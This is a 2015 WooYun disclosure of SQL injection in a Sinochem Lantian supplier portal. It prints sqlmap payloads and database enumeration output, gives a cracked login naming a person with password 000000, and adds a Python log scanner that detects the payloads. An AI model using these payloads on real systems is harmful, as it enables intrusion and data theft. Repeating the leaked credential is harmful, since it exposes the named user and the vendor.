
Vulnerability summary

Defect ID: wooyun-2015-0152917

Title: SQL injection in the Sinochem Lantian Group supplier system (DBA privileges / logged in)

Affected vendor: sinochemlt.com

Author: Ysql404

Submitted: 2015-11-12 00:50

Fixed: 2015-12-17 13:31

Published: 2015-12-17 13:31

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-11-12: Details sent to the vendor, awaiting vendor handling
2015-11-12: Vendor has confirmed; details disclosed to the vendor only
2015-11-22: Details disclosed to core white hats and relevant domain experts
2015-12-02: Details disclosed to regular white hats
2015-12-12: Details disclosed to intern white hats
2015-12-17: Vendor has fixed the vulnerability and disclosed it proactively; details disclosed to the public

Brief description:

SQL injection in the Sinochem Lantian Group supplier system (DBA privileges / logged in)

Detailed description:

SQL injection in the Sinochem Lantian supplier portal
Injection point: http://**.**.**.**:801/OutPortal/OutPortalDetailView?messageid=86

[Screenshot: QQ图片20151108173352.jpg]


The injected user holds Oracle administrator (DBA) privileges:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: messageid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: messageid=86 AND 7119=7119
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: messageid=86 AND 9123=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(108)||CHR(104)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9123=9123) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(108)||CHR(104)||CHR(113))
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: messageid=86 AND 4279=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[17:26:57] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle
[17:26:57] [INFO] fetching current user
[17:26:57] [INFO] retrieved: SRM
current user: 'SRM'
[17:26:57] [INFO] fetching current database
[17:26:57] [INFO] resumed: SRM
[17:26:57] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SRM'
[17:26:57] [INFO] testing if current user is DBA
current user is DBA: True
[17:26:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[17:26:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
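The three techniques sqlmap lists above (a boolean tautology, an Oracle UTL_INADDR error-based probe, and a heavy self-join of ALL_USERS for timing) leave recognisable traces in the web server's request log. As an added example that is not part of the original report, the following Python scans constructed IIS W3C-style log lines for those payload shapes and, as a fallback, flags any `messageid` value that is not a plain integer; the log lines, client IPs and field layout are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS W3C-style log lines (not from the report). Assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2015-11-08 17:26:57 10.0.0.5 GET /OutPortal/OutPortalDetailView messageid=86 801 - 203.0.113.7 Mozilla/5.0 200
2015-11-08 17:26:57 10.0.0.5 GET /OutPortal/OutPortalDetailView messageid=86%20AND%207119%3D7119 801 - 203.0.113.7 sqlmap/1.0 200
2015-11-08 17:26:57 10.0.0.5 GET /OutPortal/OutPortalDetailView messageid=86%20AND%209123%3DUTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(108)) 801 - 203.0.113.7 sqlmap/1.0 500
2015-11-08 17:26:58 10.0.0.5 GET /OutPortal/OutPortalDetailView messageid=86%20AND%204279%3D(SELECT%20COUNT(*)%20FROM%20ALL_USERS%20T1,ALL_USERS%20T2) 801 - 203.0.113.7 sqlmap/1.0 200
2015-11-08 17:27:01 10.0.0.5 GET /OutPortal/OutPortalDetailView messageid=87 801 - 198.51.100.9 Mozilla/5.0 200
"""

# Signatures mirroring the three sqlmap techniques listed in the report's output.
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),  # e.g. AND 7119=7119
    "oracle-error-based": re.compile(r"\bUTL_INADDR\.GET_HOST_ADDRESS\s*\(", re.I),
    "oracle-heavy-query": re.compile(r"\bFROM\s+ALL_USERS\s+\w+\s*,\s*ALL_USERS\b", re.I),
}

def scan_iis_log(text):
    """Return (line_no, client_ip, finding) for each request whose query looks injected."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        fields = line.split(" ")
        if not line or line.startswith("#") or len(fields) < 9:
            continue  # blank, W3C header or malformed row
        raw_query, client_ip = fields[5], fields[8]
        decoded = unquote_plus(raw_query)  # payloads arrive URL-encoded
        for name, rx in SIGNATURES.items():
            if rx.search(decoded):
                findings.append((n, client_ip, name))
                break
        else:
            # messageid is a numeric row id on this endpoint; anything else is
            # anomalous even if it matches none of the known payload shapes.
            vals = parse_qs(raw_query, keep_blank_values=True).get("messageid", [])
            if vals and not all(v.isdigit() for v in vals):
                findings.append((n, client_ip, "non-numeric messageid"))
    return findings

def offending_clients(findings):
    """Count findings per client IP so a single scanner source stands out."""
    counts = {}
    for _, ip, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

The same type check (integer only) applied before the value reaches the query is the server-side form of the "filtering" the fix section recommends; the log scan only tells you it was missing.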


Database information

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] INTERFACELIBRARY
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SRM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


Tables in the current database

Database: SRM
[280 tables]


Part of the data in the SYSUSER table

Database: SRM
Table: SYSUSER
[9181 entries]

Proof of vulnerability:

[Screenshot: QQ图片20151109072800.png]

[Screenshot: QQ图片20151109072845.png]

After the MD5 hash is cracked the system can be logged into; login username and password: 尹海飞/000000

[Screenshot: QQ图片20151109073104.jpg]

[Screenshot: QQ图片20151109073233.jpg]

[Screenshot: QQ图片20151109074213.png]

[Screenshot: QQ图片20151109074244.png]

Fix recommendation:

Input filtering

Copyright notice: please credit the source when reposting: Ysql404@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmation time: 2015-11-12 08:37

Vendor reply:

This could lead to leakage of customer information and important business data; very serious. We will fix it as soon as possible.

Latest status:

2015-11-20: @路人甲 The system vendor has fixed the injection vulnerability; could you help confirm?

2015-11-26: @乌云 The vulnerability has been fixed and can be disclosed. But could the personnel names, phone numbers, e-mail addresses, supplier names and contract amounts be hidden? These are all commercially sensitive information.

2015-12-17: Fixed.